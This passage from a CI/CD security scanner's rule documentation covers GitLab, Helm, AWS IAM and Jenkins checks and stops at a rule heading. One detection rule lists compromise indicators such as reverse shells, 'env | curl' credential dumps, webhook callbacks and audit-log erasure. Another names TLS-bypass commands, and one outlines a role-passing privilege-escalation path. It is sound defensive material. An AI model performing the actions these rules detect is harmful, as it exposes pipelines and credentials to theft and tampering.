Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-021 in the GitLab CI provider.

GL-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.

Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR workflow (e.g. Dependabot, Renovate).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Common build-tool bootstrapping idioms (pip install --upgrade pip, pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by the DEP_UPDATE_RE tooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH to ignore.

Source: GL-022 in the GitLab CI provider.

GL-023: TLS / certificate verification bypass HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.

Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-023 in the GitLab CI provider.

GL-024: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. cosign sign and cosign attest look similar but mean different things: the first binds identity to bytes; the second binds a structured claim (builder, source, inputs) to the artifact. SLSA Build L3 verifiers check the latter.

Recommendation. Add a job that runs cosign attest against a provenance.intoto.jsonl statement, or adopt a SLSA-aware builder (the SLSA project ships GitLab templates). Signing the artifact (GL-006) isn't enough for SLSA L3, the attestation describes how the build ran.

Source: GL-024 in the GitLab CI provider.

GL-025: Pipeline contains indicators of malicious activity CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Fires on concrete indicators (reverse shells, base64-decoded execution, miner binaries, Discord/Telegram webhooks, webhook.site callbacks, env | curl credential dumps, history -c audit erasure). Orthogonal to GL-003 (curl pipe) and GL-017 (Docker insecure flags). Those flag risky defaults; this flags evidence.

Recommendation. Treat as a potential compromise. Identify the MR that added the matching job(s), rotate any credentials the pipeline can reach, and audit recent runs for outbound traffic to the matched hosts. A legitimate red-team exercise should be time-bounded via .pipelinecheckignore with expires:.

Known false positives.

  • Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
  • Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.

Source: GL-025 in the GitLab CI provider.

GL-026: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. eval, sh -c "$X", and `$X` all re-parse the variable's value as shell syntax. Once a CI variable feeds into one of these idioms, any ;, &&, |, backtick, or $() in the value executes, even if the variable's source is currently trusted, future refactors may expose it.

Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec of variables with direct command invocation. If the command must be dynamic, pass arguments as array members or validate the input against an allow-list at the boundary.

Known false positives.

  • eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd.

Source: GL-026 in the GitLab CI provider.

GL-027: Package install bypasses registry integrity (git / path / tarball source) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Complements GL-021 (missing lockfile flag). Git URL installs without a commit pin, local-path installs, and direct tarball URLs all bypass the registry integrity controls the lockfile relies on, an attacker who can move a branch head, drop a sibling checkout, or change a served tarball can substitute code into the build.

Recommendation. Pin git dependencies to a commit SHA (pip install git+https://…/repo@<sha>, cargo install --git … --rev <sha>). Publish private packages to an internal registry instead of installing from a filesystem path or tarball URL.

Source: GL-027 in the GitLab CI provider.

GL-028: services: image not pinned HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. services: entries (top-level or per-job) can be either a string (redis:7) or a dict ({name: redis:7, alias: cache}). Both forms are normalized via image_ref-style extraction and evaluated with the same floating-tag regex GL-001 uses for image:.

Recommendation. Pin every services: entry the same way image: is pinned, prefer @sha256:<digest>, or at minimum a full immutable version tag (postgres:16.2-alpine). Avoid :latest and bare tags like :16.

Source: GL-028 in the GitLab CI provider.

GL-029: Manual deploy job defaults to allow_failure: true MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. This is the most common GitLab deployment gotcha: a manual deploy job looks like a gate in the UI, but the pipeline reports success on the first run because the job is marked allow_failure by default. Downstream jobs (and the overall pipeline status) proceed as though the human approved.

Recommendation. Add allow_failure: false to every deploy-like when: manual job. GitLab defaults allow_failure to true for manual jobs, which makes the pipeline report success whether or not the operator clicks, exactly the opposite of the gate you meant to add.

Source: GL-029 in the GitLab CI provider.

GL-030: trigger: include: pulls child pipeline without pinned ref HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. GL-005 only audits top-level include:. Parent-child and multi-project pipelines that load YAML via the job-level trigger: include: slot slip through. Branch refs (main/master/develop/head) count as unpinned.

Recommendation. Pin trigger: include: project: entries with ref: set to a tag or commit SHA. Avoid trigger: include: remote: for untrusted URLs; mirror the content into a trusted project and pin it there.

Source: GL-030 in the GitLab CI provider.

GL-031: id_tokens: missing audience pin or environment binding HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Pairs with IAM-008. IAM-008 verifies the cloud-side trust policy pins audience + subject; this rule verifies the GitLab-side workflow can't request a token without an audience claim or without a deployment gate.

Recommendation. For every job that declares an id_tokens: block, pin a non-wildcard aud: (a literal string the consumer trusts) AND bind the job to a protected environment:. Audience pinning prevents token replay against unintended consumers; the environment binding gates which refs can drive the assume-role on the consumer side.

Source: GL-031 in the GitLab CI provider.

GL-032: tags: interpolates untrusted CI variable HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. GL-014 catches self-managed runners that aren't ephemeral; this rule catches the upstream targeting choice. When tags: is computed from an attacker-controllable CI variable, the operator (or anyone who can craft a PR title / branch name / commit message that the workflow consumes) picks where the job runs, including any privileged tag the instance exposes (deploy-prod, signer, hsm …). The rule reuses the same untrusted-context catalog as GL-002 (CI_COMMIT_MESSAGE, CI_COMMIT_REF_NAME, CI_MERGE_REQUEST_TITLE and friends) so the two rules stay in lockstep.

Recommendation. Hard-code tags: to a specific runner tag list. If runner selection has to be parameterised, validate the candidate value against an explicit allowlist in a job rules: block before the job runs, and never accept a $CI_COMMIT_* / $CI_MERGE_REQUEST_* field as a tag value directly.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Workflows that intentionally select runners by environment via a vetted variables: block (RUNNER_TAG: deploy-prod) referencing a build-time-set value are out of scope, the rule only matches the curated untrusted-predefined-variable catalog. Static custom variables ($DEPLOY_FLEET defined inside the workflow file) are intentionally not flagged.

Source: GL-032 in the GitLab CI provider.

GL-033: Global before_script / after_script propagates taint to every job HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. GL-002 catches injection in per-job before_script: / script: / after_script:, but its scanner walks iter_jobs which deliberately skips top-level keywords (before_script, after_script, default, image, services, variables, stages, workflow, include, ...). That means a tainted $CI_COMMIT_TITLE interpolation in a document-root before_script: or default.before_script: evades GL-002 entirely, even though it propagates to every job in the pipeline.

GL-033 closes that gap. It scans:

  • before_script: at document root
  • after_script: at document root
  • default.before_script: (the modern form)
  • default.after_script:

for direct interpolation of the same attacker-controllable predefined variables tracked by GL-002 (CI_COMMIT_TITLE / CI_COMMIT_MESSAGE / CI_COMMIT_REF_NAME / CI_MERGE_REQUEST_TITLE / CI_MERGE_REQUEST_SOURCE_BRANCH_NAME / etc.). The detection mirrors GL-002's has_direct_taint helper so the quote-aware semantics are identical.

Recommendation. Move any setup logic that touches commit / MR metadata out of the document-root before_script: (and default.before_script: / default.after_script:) and into a dedicated job that opts in via extends: or that runs on a known-safe trigger only. The global before-script runs verbatim before every job in the pipeline (including child pipelines launched by trigger:include:); a single unquoted $CI_COMMIT_TITLE interpolation there is, in effect, that injection in N jobs at once. Quote the value defensively (branch="$CI_COMMIT_REF_NAME") and copy it into a job-local variable before any further use.

Known false positives.

  • Some self-hosted GitLab installations build a diagnostic banner into the global before_script that echos commit metadata for log-correlation purposes. Suppress per pipeline file rather than globally, the rule is checking propagation reach, not intent.

Source: GL-033 in the GitLab CI provider.

HELM-001: Chart.yaml declares legacy apiVersion: v1 MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. apiVersion lives at the top of Chart.yaml. v1 is Helm 2's format and uses a sibling requirements.yaml for dependencies; v2 is Helm 3's format and inlines them in Chart.yaml alongside a Chart.lock for digest pinning. Without v2 there is no in-tree dependency manifest to lock, which is why HELM-002 only fires on v2 charts.

Recommendation. Bump Chart.yaml to apiVersion: v2 and migrate any sibling requirements.yaml entries into the dependencies: list inside Chart.yaml. Run helm dependency update to regenerate Chart.lock so HELM-002's per-dependency digest check has something to read. Helm 3 has been the default shipping channel since November 2019; the v1 format is kept for read-compat but blocks lockfile-based supply-chain controls.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: HELM-001 in the Helm provider.

HELM-002: Chart.lock missing per-dependency digests HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Three failure shapes:

  1. Chart.yaml declares dependencies but no Chart.lock exists at all.
  2. Chart.lock exists but its dependencies: list is missing entries declared in Chart.yaml (drift after an edit without re-running helm dependency update).
  3. Chart.lock lists every dependency but one or more entries lack a digest: field (lock generated by an old Helm 3 version that didn't always populate it).

v1 charts (HELM-001) are skipped. They predate Chart.lock and use requirements.lock against a sibling requirements.yaml. Fix HELM-001 first.

Recommendation. After every change to dependencies: in Chart.yaml, re-run helm dependency update and commit the regenerated Chart.lock. The lock records the resolved version and a sha256:... digest that helm dependency build verifies on download, without it, a compromised chart repo can swap the tarball under the same version and helm install will happily use the substitute.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Charts with no dependencies (the dependencies: key is absent or empty) pass automatically. There is nothing to lock.

Source: HELM-002 in the Helm provider.

HELM-003: Chart dependency declared on a non-HTTPS repository HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Walks Chart.yaml dependencies: (v2 charts only) and inspects each entry's repository: URL. Accepted schemes:

  • https://, chart-museum / OSS chart repos. The default for public Helm charts.
  • oci://, registry-hosted charts. TLS is enforced by the registry, not the URL scheme; we still accept this shape because Helm 3.8+ pulls OCI charts over HTTPS unless explicitly configured otherwise.
  • file://, in-repo dependency. No network surface.
  • @alias, local alias for a previously registered helm repo add URL. The scheme of the original URL is the user's responsibility (and is captured in the chart consumer's ~/.config/helm/repositories.yaml).

Recommendation. Switch each dependencies[].repository value to an https:// chart repo URL, an oci:// registry reference, or a file:// path for in-repo charts. Plaintext http:// (and other non-TLS schemes like git://) lets any on-path attacker substitute the dependency tarball during helm dependency build; Chart.lock's digest check (HELM-002) only catches that on the next update, not the compromised pull itself.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: HELM-003 in the Helm provider.

HELM-004: Chart dependency version is a range, not an exact pin MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. An exact pin is a string that contains only digits, dots, and at most a single leading v / trailing pre-release or build identifier (1.2.3, v1.2.3, 1.2.3-rc1, 1.2.3+build.5). Anything carrying ^ / ~ / > / < / * / x / X / || / a space (>=4 <5) is treated as a range. The bias is toward false positives, a chart maintainer can suppress per-rule via --ignore-file if they specifically want range semantics, but the default for production charts is a pin.

Recommendation. Replace each dependencies[].version constraint with the exact resolved version from Chart.lock. 17.0.0 instead of ^17.0.0, v1.2.3 instead of ~1.2. Range syntax (^, ~, >=, *, x) lets helm dependency update move every consumer of the chart to a newer dep on the next refresh, even when the lock file looked stable.

Source: HELM-004 in the Helm provider.

HELM-005: Chart maintainers field empty or missing chain-of-custody info LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. An maintainers: entry is considered usable when the value is a YAML mapping with name: set to a non-empty string and at least one of email: / url: populated. Entries that look like - name: TODO or carry blank contact fields fail the rule the same way a missing block does, the field exists but doesn't carry a real chain-of-custody signal.

Recommendation. Populate maintainers: in Chart.yaml with at least one entry carrying a name plus either an email or a url. The name is the human a downstream consumer files an issue against; the contact field is the channel they reach. Charts published to ArtifactHub or an internal registry without this field are silently anonymous, fine for a personal scratch chart, not for one your CI pipeline will deploy to production.

Known false positives.

  • Library charts (Chart.yaml type: library) often ship without maintainers when distributed inside a single team's monorepo where the org-level CODEOWNERS already names the contact. Suppress with --ignore-file when this matches your situation.

Source: HELM-005 in the Helm provider.

HELM-006: Chart.yaml does not declare a kubeVersion compatibility range LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. The field is a string carrying a Helm-flavoured SemVer range. Empty / missing fails the rule. Whitespace-only values fail too, an obviously-blank key should not satisfy a posture check.

Recommendation. Add a kubeVersion: SemVer range to Chart.yaml covering the Kubernetes versions you've actually rendered and tested the chart against. >= 1.25.0 < 1.32.0 is the common shape for a chart maintained against the upstream support window. Helm will refuse helm install against a cluster whose kubectl version falls outside the range, catching silent-breakage surprises (removed apiVersions, renamed RBAC verbs, alpha features) at pre-flight rather than at runtime.

Known false positives.

  • Library charts (Chart.yaml type: library) that wrap version-agnostic helpers often legitimately ship without kubeVersion. Suppress with --ignore-file when the chart genuinely targets every supported Kubernetes minor.

Source: HELM-006 in the Helm provider.

HELM-007: Chart.yaml description field is empty or missing LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Walks Chart.yaml description: and fires when the field is missing, None, or a string that's empty after stripping whitespace. The Helm chart spec doesn't enforce the field but every chart published to ArtifactHub or the upstream stable repo populates it; production charts that ship without it are usually a copy-paste-from-template oversight.

Recommendation. Set description: in Chart.yaml to a one-sentence summary of what the chart deploys (e.g. description: Postgres 14 cluster with WAL-G backups and a Prometheus exporter). Helm registries display this string in chart listings; without it, anyone browsing has to read the README to figure out what the chart does.

Source: HELM-007 in the Helm provider.

HELM-008: Chart.lock generated more than 90 days ago MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Reads Chart.lock's top-level generated: timestamp (an ISO-8601 string Helm writes when the lock was last regenerated) and compares against now. Fires when the delta is more than 90 days. Charts without Chart.lock are skipped. HELM-002 covers the missing-lock case directly. Charts whose generated: field is malformed or absent silently pass on this rule (HELM-002 covers the absent-lock case from a different angle).

Recommendation. Run helm dependency update against every dependency-carrying chart at least once per release cycle, and commit the regenerated Chart.lock. The lock pins versions and digests; the update cadence is what brings in CVE fixes and deprecation notices from the last quarter. CI can run the same command against main weekly to surface drift as a PR rather than letting the lock sit stale until the next release.

Known false positives.

  • A chart that pins exact versions and never needs new dependencies (e.g. a chart packaging a single internal library that itself updates rarely) may legitimately have a stale Chart.lock. Suppress with --ignore-file when this matches your situation.

Source: HELM-008 in the Helm provider.

HELM-009: Chart home / sources URL uses a non-HTTPS scheme LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Walks Chart.yaml home: (single string) and sources: (list of strings). Fires on any value whose scheme is http://, ftp://, or other plaintext form. Empty / missing fields pass, the rule only evaluates URLs that are populated with the wrong scheme. HELM-003 covers the same risk for dependency-repo URLs.

Recommendation. Switch every home: URL and every entry in sources: to https://. Most chart-listing UIs display these as click-through links from a public chart registry; serving them over plaintext is a confused-deputy footgun for anyone evaluating the chart's provenance. http:// URLs against localhost are not exempted, production charts shouldn't ship references to a developer-local endpoint anyway.

Source: HELM-009 in the Helm provider.

HELM-010: Chart.yaml appVersion field is empty or missing LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Library charts (Chart.yaml type: library) legitimately don't have an appVersion because they package no application. Those are exempted. For application charts (type: application, the default), appVersion is required for CVE tracking and release-tracking; without it, helm list shows - in the AppVersion column and downstream consumers have no signal.

Recommendation. Set appVersion: in Chart.yaml to the version of the application the chart packages (e.g. appVersion: "17.2" for a Postgres-17.2 chart at version: 1.4.2). When the upstream application releases, bump appVersion and re-cut the chart. Helm's CLI displays appVersion alongside the chart version in helm list, so downstream operators can see which app version is running where.

Source: HELM-010 in the Helm provider.

IAM-000: IAM API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: IAM-000 in the AWS provider.

IAM-001: CI/CD role has AdministratorAccess policy attached CRITICAL

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. A CI/CD service role with AdministratorAccess attached turns any pipeline compromise into account compromise. The classic anti-pattern: the role started narrow, the pipeline grew, someone attached AdministratorAccess to unblock a deploy, and it never came off.

Recommendation. Replace AdministratorAccess with least-privilege policies.

Source: IAM-001 in the AWS provider.

IAM-002: CI/CD role has wildcard Action in attached policy HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Action: '*' (or service-prefix wildcards like s3:*) on an attached policy is functionally equivalent to AdministratorAccess for that resource. The wildcard absorbs every new IAM action AWS adds, so the role's authority grows without any local change.

Recommendation. Replace wildcard actions with specific IAM actions.

Source: IAM-002 in the AWS provider.

IAM-003: CI/CD role has no permission boundary MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. A permissions boundary is the maximum-permission ceiling for a role. Without one, every future PR that attaches another inline / managed policy raises the role's effective authority indefinitely. With a boundary in place, the policy churn happens beneath a fixed cap that your security team owns separately.

Recommendation. Attach a permissions boundary defining max permissions.

Source: IAM-003 in the AWS provider.

IAM-004: CI/CD role can PassRole to any role HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. iam:PassRole with Resource: '*' lets the principal hand any role to any service. Combined with a service that runs your code (Lambda, ECS, CodeBuild, EC2 Instance Profiles), this is role-hop privilege escalation: launch an ephemeral resource configured with a higher-privileged role, run code under that identity, exfil. Scoping by ARN + iam:PassedToService removes the escalation path.

Recommendation. Restrict iam:PassRole to specific role ARNs and add an iam:PassedToService condition.

Source: IAM-004 in the AWS provider.

IAM-005: CI/CD role trust policy missing sts:ExternalId HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. A trust policy that lets an external AWS account assume the role without an sts:ExternalId condition is vulnerable to the confused-deputy pattern: a third-party SaaS configured with your role ARN can also be used by another customer of that SaaS to assume your role (if they know the ARN). sts:ExternalId ties the role to a specific tenancy.

Recommendation. Add a Condition requiring sts:ExternalId for external principals.

Source: IAM-005 in the AWS provider.

IAM-006: Sensitive actions granted with wildcard Resource MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. IAM-002 catches Action: "*". IAM-006 catches the more common "scoped action, unscoped resource" pattern on sensitive services (S3/KMS/SecretsManager/SSM/IAM/STS/DynamoDB/Lambda/EC2).

Recommendation. Scope the Resource element to specific ARNs (buckets, keys, secrets, roles).

Source: IAM-006 in the AWS provider.

IAM-007: IAM user has access key older than 90 days HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Every user in the account is evaluated. CI/CD tooling that still uses IAM users (older Jenkins agents, GitHub Actions pre-OIDC, third-party schedulers) shows up here. The 90-day window matches the common compliance baseline; rotate sooner if the key is used from on-prem or an untrusted runner.

Recommendation. Rotate or delete IAM access keys older than 90 days. Long-lived static credentials are the #1 way compromised CI credentials get reused across environments, prefer short-lived STS tokens via OIDC federation or an assumed role.

Source: IAM-007 in the AWS provider.

IAM-008: OIDC-federated role trust policy missing audience or subject pin HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. IAM-005 already covers cross-account AWS principals. This rule targets the OIDC federation path specifically because the blast radius of a missed audience/subject pin is the entire identity provider's tenant base (e.g. all GitHub users, not just your org).

Recommendation. Every Allow statement that trusts a federated OIDC provider (token.actions.githubusercontent.com, GitLab, CircleCI, Terraform Cloud, etc.) must pin both the audience (...:aud = sts.amazonaws.com) and a subject prefix (...:sub matching repo:myorg/*). Without these, any workflow from any tenant can assume the role.

Source: IAM-008 in the AWS provider.

JF-001: Shared library not pinned to a tag or commit HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. @main, @master, @develop, no-@ref, and any non-semver / non-SHA ref are floating. Whoever controls the upstream library can ship code into your build by pushing to that branch.

Recommendation. Pin every @Library('name@<ref>') to a release tag (e.g. @v1.4.2) or a 40-char commit SHA. Configure the library in Jenkins with 'Allow default version to be overridden' disabled so a pipeline can't escape the pin.

Source: JF-001 in the Jenkins provider.

JF-002: Script step interpolates attacker-controllable env var HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. $BRANCH_NAME / $GIT_BRANCH / $TAG_NAME / $CHANGE_* are populated from SCM event metadata the attacker controls. Single-quoted Groovy strings don't interpolate so they're safe; only double-quoted / triple-double-quoted bodies are flagged.

Recommendation. Switch the affected sh/bat/powershell step to a single-quoted string (Groovy doesn't interpolate single quotes), and pass values through a quoted shell variable (sh 'echo "$BRANCH"' after withEnv([...])).

Source: JF-002 in the Jenkins provider.

JF-003: Pipeline uses agent any (no executor isolation) MEDIUM

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. agent any is the broadest possible executor scope, any registered executor can be picked, including ones with broader IAM / file-system access than this build needs. A compromise of one job blast-radiates across every pool.

Recommendation. Replace agent any with agent { label 'build-pool' } (targeting a labeled pool) or agent { docker { image '...' } } (ephemeral container). Reserve broad-access agents for jobs that genuinely need them.

Source: JF-003 in the Jenkins provider.

JF-004: AWS auth uses long-lived access keys via withCredentials MEDIUM 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Fires when BOTH a credentialsId containing aws is referenced AND an AWS key variable name appears (requires both so an OIDC role binding doesn't false-positive). Also fires when withAWS(credentials: '…') is used, the safe alternative is withAWS(role: '…').

Recommendation. Switch to the AWS plugin's IAM-role / OIDC binding (e.g. withAWS(role: 'arn:aws:iam::…:role/jenkins')) so each build assumes a short-lived role. Remove the static AWS_ACCESS_KEY_ID secret from the Jenkins credentials store once the role is in place.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-004 in the Jenkins provider.

JF-005: Deploy stage missing manual input approval MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. A stage named deploy / release / publish / promote should either use the declarative input { ... } directive or call input message: ... somewhere in its body. Without one, any push that triggers the pipeline ships to the target with no human review.

Recommendation. Add an input step to every deploy-like stage (e.g. input message: 'Promote to prod?', submitter: 'releasers'). Combine with a Jenkins folder-scoped permission so only release engineers see the prompt.

Source: JF-005 in the Jenkins provider.

JF-006: Artifacts not signed MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Passes when cosign / sigstore / slsa-* / notation-sign appears in executable Jenkinsfile text (comments are stripped before matching).

Recommendation. Add a sh 'cosign sign --yes …' step (the cosign-installer Jenkins plugin handles binary install). Publish the signature next to the artifact and verify it at deploy.

Source: JF-006 in the Jenkins provider.

JF-007: SBOM not produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Passes when a direct SBOM tool token (CycloneDX, syft, anchore, spdx-sbom-generator, sbom-tool) appears in executable code, or when Trivy is paired with sbom / cyclonedx in the same file. Comments are stripped before matching.

Recommendation. Add a sh 'syft . -o cyclonedx-json > sbom.json' step (or Trivy with --format cyclonedx) and archive the result with archiveArtifacts.

Source: JF-007 in the Jenkins provider.

JF-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Scans the raw Jenkinsfile text against the cross-provider credential-pattern catalog. Secrets committed to Groovy source are visible in every fork and every build log.

Recommendation. Rotate the exposed credential. Move the value to a Jenkins credential and reference it via withCredentials([string(credentialsId: '…', variable: '…')]).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed, if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.

Source: JF-008 in the Jenkins provider.

JF-009: Agent docker image not pinned to sha256 digest HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. agent { docker { image 'name:tag' } } is not digest-pinned, so a repointed registry tag silently swaps the executor under every subsequent build. Unlike the YAML providers, Jenkins has no separate tag-pinning check, so this one fires at HIGH regardless of whether the tag is floating or immutable.

Recommendation. Resolve each image to its current digest (docker buildx imagetools inspect <ref> prints it) and reference it via image '<repo>@sha256:<digest>'. Automate refreshes with Renovate.

Source: JF-009 in the Jenkins provider.

JF-010: Long-lived AWS keys exposed via environment {} block HIGH 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Flags environment { AWS_ACCESS_KEY_ID = '...' } when the value is a literal or plain variable reference. Skips credentials('id') helpers and ${env.X} that resolve at runtime. Matches both multiline and inline environment { ... } forms.

Recommendation. Replace the literal with a credentials-store reference: AWS_ACCESS_KEY_ID = credentials('aws-prod-key'). Better: switch to the AWS plugin's role binding (withAWS(role: 'arn:…')) so the build assumes a short-lived role per run.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-010 in the Jenkins provider.

JF-011: Pipeline has no buildDiscarder retention policy LOW 🔧 fix

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Without a retention policy, build logs accumulate indefinitely; a secret that once leaked into a log stays visible to anyone who can read jobs. Recognises declarative options { buildDiscarder(...) }, scripted properties([buildDiscarder(...)]), and bare logRotator(...).

Recommendation. Add options { buildDiscarder(logRotator(numToKeepStr: '30', daysToKeepStr: '90')) } (declarative) or the properties([buildDiscarder(...)]) equivalent in scripted pipelines. Tune the numbers to your retention policy.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-011 in the Jenkins provider.

JF-012: load step pulls Groovy from disk without integrity pin MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. load 'foo.groovy' evaluates whatever exists at the path when the build runs, there's no integrity check, so a workspace mutation can swap the loaded code between runs.

Recommendation. Move shared Groovy into a Jenkins shared library (@Library('name@<sha>')). Those are version-pinned and JF-001 audits them. Reserve load for one-off development experiments.

Source: JF-012 in the Jenkins provider.

JF-013: copyArtifacts ingests another job's output unverified CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Recognises both copyArtifacts(projectName: ...) and the older step([$class: 'CopyArtifact', ...]) form. If the upstream job accepts multibranch or PR builds, the artifact may have been produced by attacker-controlled code.

Recommendation. Add a verification step before consuming the artifact: sh 'sha256sum -c manifest.sha256' against a manifest the producer signed, or cosign verify over the artifact directly. Restrict the upstream job to non-PR builds via branch protection if verification isn't feasible.

Source: JF-013 in the Jenkins provider.

JF-014: Agent label missing ephemeral marker MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Static Jenkins agents that persist between builds leak workspace files and process state. The check looks for an ephemeral substring in agent { label '...' } blocks.

Recommendation. Register Jenkins agents with ephemeral lifecycle (e.g. Kubernetes pod templates or EC2 Fleet plugin) and include ephemeral in the label string so the pipeline declares its expectation.

Known false positives.

  • The check looks for the literal substring ephemeral in the agent label. Teams that use a different convention (temp, runner-pool, org-specific ARC labels) trip the rule even when their runners are auto-scaled and ephemeral in fact. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH.

Source: JF-014 in the Jenkins provider.

JF-015: Pipeline has no timeout wrapper, unbounded build MEDIUM 🔧 fix

